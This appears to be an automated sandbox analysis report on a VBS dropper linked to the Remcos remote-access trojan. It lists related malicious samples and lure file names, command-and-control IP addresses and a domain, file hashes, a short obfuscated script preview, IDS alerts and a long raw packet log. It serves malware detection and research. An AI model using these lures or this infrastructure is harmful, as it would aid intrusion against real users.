                                2024remcmon.duckdns.org1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                girlfrnd.docGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                • 192.210.214.9
                                izjbNXbbDX.rtfGet hashmaliciousRemcosBrowse
                                • 107.172.31.178
                                1710228246da2ebbe442542c426e28c0df992bca85d59c521a027975c70d161027e53b6d2f971.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 107.172.31.178
                                RFQ No. PO414501.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 107.172.31.178
                                geoplugin.net41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                • 178.237.33.50
                                172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 178.237.33.50
                                erthings.docGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                girlfrnd.docGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS-COLOCROSSINGUScreatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                • 198.46.176.133
                                FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                • 107.173.160.137
                                jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                • 23.94.183.150
                                WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                • 104.168.36.68
                                172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.3.101.142
                                1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                                • 198.46.176.133
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 104.168.45.34
                                AS-COLOCROSSINGUScreatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                • 198.46.176.133
                                FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                • 107.173.160.137
                                jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                • 23.94.183.150
                                WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                • 104.168.36.68
                                172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.3.101.142
                                1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                                • 198.46.176.133
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 104.168.45.34
                                ATOM86-ASATOM86NL41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                • 178.237.33.50
                                172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 178.237.33.50
                                erthings.docGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                girlfrnd.docGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                • 178.237.33.50
                                AS-COLOCROSSINGUScreatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                • 198.46.176.133
                                FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                • 107.173.160.137
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                • 107.173.160.137
                                jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                • 23.94.183.150
                                WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                • 104.168.36.68
                                172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.3.101.142
                                1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 192.210.214.9
                                IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                                • 198.46.176.133
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 104.168.45.34
                                No context
                                No context
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):962
                                Entropy (8bit):5.012309356796613
                                Encrypted:false
                                SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                                MD5:14B479958E659C5A4480548A393022AC
                                SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                                SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                                SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllultnxj:NllU
                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Entropy (8bit):3.575965695258709
                                TrID:
                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                • MP3 audio (1001/1) 32.22%
                                • Lumena CEL bitmap (63/63) 2.03%
                                • Corel Photo Paint (41/41) 1.32%
                                File name:createactiveimagesbeautygirlfrnd.gIF.vbs
                                File size:427'434 bytes
                                MD5:fd92f8bccf35e72fe49bab1b596eefce
                                SHA1:40ecaf11bef8907906b8ddea0ae7d90098a4cebc
                                SHA256:bfae575fb0e846ba3d7929e3d8a8e593dcd529ed6ff2f0f6d6378339b0f10aa8
                                SHA512:d344643c03f233667a115149110cd89b3570c87012e578b1cf793b2515a524a3980a99b2c51712e406bd3ad92dcaa17f76eb81a8ab0a767ce5ee403dd428d0f6
                                SSDEEP:3072:sHGgwfzYF2hNe4VTdRnTT8w4TWEvqK3g4YpFka+bS7oNePYZCRAXG+al8zq:2wfzYF1vqP
                                TLSH:9C94CE1662ED5108F2F33F54A9BA55258A3BBEEA9C79C54D05CC5A5E0BE3A00CC707B3
                                File Content Preview:..d.i.m. .p.o.s.u.a.l. .....p.o.s.u.a.l. .=. .r.e.g.a.....i.n.a.u.t.e.n.t.i.c.i.d.a.d.e.(.".p.a.l.p.a.b.i.l.i.z.a.r.".). .&. .p.o.s.u.a.l. .&. ._.....i.n.a.u.t.e.n.t.i.c.i.d.a.d.e.(.".a.n.e.g.a.l.h.a.r.".). .&. .p.o.s.u.a.l. .&. ._.....i.n.a.u.t.e.n.t.i.c
                                Icon Hash:68d69b8f86ab9a86
                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                2024-07-27T13:33:04.956471+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435470513.85.23.86192.168.2.7
                                2024-07-27T13:32:11.251710+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4970114645192.168.2.7192.210.214.9
                                2024-07-27T13:32:08.868194+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049699198.46.176.133192.168.2.7
                                2024-07-27T13:32:24.217562+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970313.85.23.86192.168.2.7
                                2024-07-27T13:32:07.798035+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049699198.46.176.133192.168.2.7
                                2024-07-27T13:32:09.837630+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049700192.3.176.154192.168.2.7
                                2024-07-27T13:32:13.238777+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4970280192.168.2.7178.237.33.50
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 27, 2024 13:32:06.844027996 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:06.848984957 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:06.849071026 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:06.849863052 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:06.854715109 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.589927912 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.589943886 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.589955091 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590003014 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.590033054 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590044975 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590054035 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590060949 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590084076 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.590110064 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.590137005 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590147018 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590156078 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590166092 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590178013 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.590209007 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.590400934 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.590445995 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.595379114 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595422983 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595436096 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.595438004 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595474958 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595478058 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.595488071 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595539093 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.595587969 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595602036 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595613003 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595642090 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.595680952 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595695972 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.595720053 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.596226931 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.596241951 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.596254110 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.596271992 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.596292019 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.596296072 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.596307993 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.596365929 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.597140074 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.597172976 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.597187042 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.597215891 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.600697994 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600724936 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600753069 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.600773096 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600788116 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600817919 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.600918055 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600928068 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.600949049 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.601471901 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.601514101 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.601520061 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.601532936 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.601571083 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.601608038 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602204084 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602216005 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602240086 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602246046 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.602255106 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602291107 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.602899075 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602941036 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.602952003 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.602963924 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603008032 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.603035927 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603665113 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603707075 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.603728056 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603787899 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603799105 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603810072 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.603832960 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.603849888 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.604609013 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.604623079 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.604634047 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.604666948 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.604743004 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.604754925 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.604780912 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.605389118 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.605432987 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.605456114 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.605490923 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.605535984 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.605573893 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.605587006 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.605633974 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.606247902 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606412888 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606447935 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606451988 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.606460094 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606492043 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606498003 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.606869936 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606945038 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606956959 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.606976032 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.606987953 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.606988907 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607275009 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607321978 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607336998 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607340097 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.607347965 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607379913 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.607692957 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.607745886 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617543936 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617568970 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617579937 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617610931 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617626905 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617641926 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617651939 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617662907 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617681980 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617701054 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617887974 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617898941 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617908955 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617923975 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617933035 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617943048 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617947102 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.617953062 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617959023 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617969036 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617980003 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.617995977 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618017912 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618089914 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618102074 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618151903 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618172884 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618185043 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618194103 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618228912 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618366003 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618376970 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618391991 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618402958 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618403912 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618412018 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618422985 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618429899 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618447065 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618532896 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618546009 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618556023 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618572950 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618586063 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618598938 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618638992 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618650913 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618678093 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618686914 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618700981 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618710995 CEST8049699198.46.176.133192.168.2.7
                                Jul 27, 2024 13:32:07.618725061 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618747950 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:07.618866920 CEST8049699198.46.176.133192.168.2.7
